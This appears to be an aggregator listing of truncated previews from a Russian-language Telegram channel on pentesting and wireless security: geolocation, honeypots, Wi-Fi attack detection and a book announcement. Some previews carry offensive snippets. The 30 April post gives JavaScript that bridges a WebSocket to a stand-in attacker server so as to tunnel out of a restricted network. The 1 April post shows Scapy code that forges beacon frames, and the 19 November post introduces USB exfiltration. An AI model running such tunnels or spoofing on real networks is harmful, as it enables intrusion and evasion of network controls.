26 Jun 2026, 08:37 UTC≈6,280 views65 reactionsread 12 August 2026 Video
Решение.
Я сделал веб-страницу (https://github.com/s0i37/geo/blob/main/location.html) в которой включены все возможные методы определения геолокации GPS/LBS, ручной режим, а так же AR. У страницы есть разные публичные тайлы (улицы, схемы, спутник, а так же поддержка своих тайлов). Трек перемещения рисуется поверх карты, а в AR режиме рисуется пространственная линия где мы уже были.
На выходе веб-страница посылает lat…
🔥53🍓6🏆3🙉2👍1
26 Jun 2026, 08:37 UTC≈2,000 views12 reactionsread 12 August 2026 Реализация.
Все 4 способа, включая GPS на сегодняшний день могут быть сделаны силами любого мобильного браузера, не требуя ни какой серверной логики. GPS или LBS доступны через js-код:
navigator.geolocation.getCurrentPosition(function(position){ position.coords.latitude,position.coords.longitude })
Для GPS нам достаточно включить в телефоне геолокацию, для LBS дополнительно включить wifi.
Если внутри здания я знаю гд…
❤6🔥5👍1
26 Jun 2026, 08:37 UTC≈2,010 views10 reactionsread 12 August 2026 Применяем дополненную реальность для геолокации и разведки беспроводных устройств.
Проблематика.
При разведке или инвентаризации беспроводных устройств сложно обойтись без определения их хотя бы примерного местоположения. С такой задачей хорошо справляется Kismet, который наблюдает за радиосигналами и взависимости от расположения точек нашего наблюдения может примерно триангулировать каждый источник сигнала - от нас…
👍4👾3❤1🔥1🤔1
1 Jun 2026, 11:00 UTC≈3,530 views48 reactionsread 12 August 2026 Photo
Первый день лета, начало велосезона, а значит время ежегодной рубрики "находим применение termux в реальной жизни".
В прошлом году я писал про велосипедную сигнализацию из старого Android-телефона (https://t.me/s0i37_channel/226). Суть заключалась в bash скрипте который непрерывно читает значение датчика ускорения и если оно больше 1G, то велосипед пришёл в движение и в качестве сигнала совершается телефонный звонок …
🔥42😁5👏1
30 Apr 2026, 07:47 UTC≈6,100 views88 reactionsread 12 August 2026 Пробрасываем сетевой туннель сквозь браузер.
При пентесте бывает так что из локальной сети наружу разрешён только трафик браузера.
С помощью следующего js-кода мы можем открыть два веб-сокета - один на опорный сервер, другой на локальное приложение, после чего связать их:
var external = new WebSocket("ws://attcker_vds:80")
var internal = new WebSocket("ws://localhost:1234")
external.onopen = function() { external.on…
🔥60👍12👀5❤🔥2👏2😎2🆒2❤1
10 Apr 2026, 08:52 UTC≈5,010 views52 reactionsread 12 August 2026 Photo
Иногда бывает нужно быстро посмотреть какие беспроводные сети вокруг, и совсем не обязательно для этого каждый раз переключаться в режим монитора, ведь сканирование эфира это штатный функционал любой сетевой карты. На Linux просмотр беспроводных сетей можно производить с помощью встроенной утилиты iw, дающий очень много информации про каждую точку доступа, что не очень удобно для быстрого просмотра.
Я написал неболь…
🔥34👍13❤2👏1👨💻1🙏1
1 Apr 2026, 10:50 UTC≈5,960 views66 reactionsread 12 August 2026 Photo
Разыгрываем хакеров в день 1 апреля.
А вы знали что все хакерские утилиты airodump-ng, bettercap и прочие показывают частотный канал точки доступа не фактический, а лишь тот который указан в beacon-пакете:
beacon = RadioTap()/Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/\
Dot11Beacon(cap='ESS+privacy')/\
Dot11Elt(ID='SSID',info=essid, len=len(essid))/\
Dot11Elt(ID='DSset', info=int(CHA…
😁38👍12❤8🔥7🤣1
1 Feb 2026, 00:48 UTC≈7,870 views129 reactionsread 12 August 2026 С 2021 года между делом я разрабатывал собственную систему ханипотов, для личных нужд. Но теперь я решил попробовать сделать её доступной для всех - https://honeypot.land.
По сути это небольшая Threat Hunting система из распределеных по разным континентам серверов-сенсоров с ханипотами (преимущественно low interaction), хитрыми снифферами, небольшой аналитикой и крутым визуалом.
Каждый входящий сетевой пакет фиксиру…
🔥92👍27👏6❤4
31 Dec 2025, 14:51 UTC≈7,090 views121 reactionsread 12 August 2026 Друзья, с наступающим новым годом! Всем здоровья, счастья, профессиональных достижений! 🎄
🔥69🎄38🤝11❤3
22 Dec 2025, 11:15 UTC≈21,700 views160 reactionsread 12 August 2026 Вышла моя вторая книга - "Хакерская самооборона", на этот раз посвященная теме защиты (https://bhv.ru/product/hakerskaya-samooborona-priemy-obnaruzheniya-i-predotvrashheniya-hakerskih-atak/). Но не скучной защите, а защите в весьма необычном хакерском стиле. По сути, это хакерский взгляд на защиту, то, как бы хакер противостоял другим хакерам, зная тонкости и слабые места в техниках и популярных инструментах.
Книга …
🔥117❤22👏11🆒6👍3😁1
19 Nov 2025, 09:08 UTC≈6,300 views59 reactionsread 12 August 2026 Эксфильтрация через USB.
При физическом пентесте корпоративного ноутбука обычно приходится иметь дело с отсутствием прав и антивирусом. Вместо того что бы разворачивать инструментарий прямо на ноуте целесообразнее превратить его в шлюз и развивать атаки со своего ПК, уклонившись тем самым от локальных средств защиты. Многочисленные корпоративные vpn зачастую имеют изьяны в своём файрволе - после включения они запреща…
🔥42👍9❤6🤓2
12 Nov 2025, 09:25 UTC≈5,200 views34 reactionsread 12 August 2026 Photo
Обнаруживаем "сырые" пакеты в радиоэфире.
Ранее я писал (https://t.me/s0i37_channel/134) как одним простым скриптом можно детектить все Wi-Fi атаки семействах Roque AP. Но есть один универсальный трюк, которым можно выявить всё семейство атак уже на точку доступа, выполняемых с позиции клиента. В сумме оба приёма позволяют покрыть детект практически 100% хакерских Wi-Fi инструментов.
Когда хакер делает AP-side атаки…
🔥15👍10❤3🤔3🤯3
Showing the 12 most recent of 19 posts we hold for @s0i37_channel. View and reaction counts are the latest single reading for each post, not a live figure, and a recent post is still accumulating both. A view count marked ≈ was rounded by Telegram before we ever saw it — t.me prints views in full below 1,000 and to three significant figures above, so ≈1,200,000 means somewhere between 1,150,000 and 1,249,999. Unmarked counts are exact. Text is reproduced from the public post preview and truncated for length.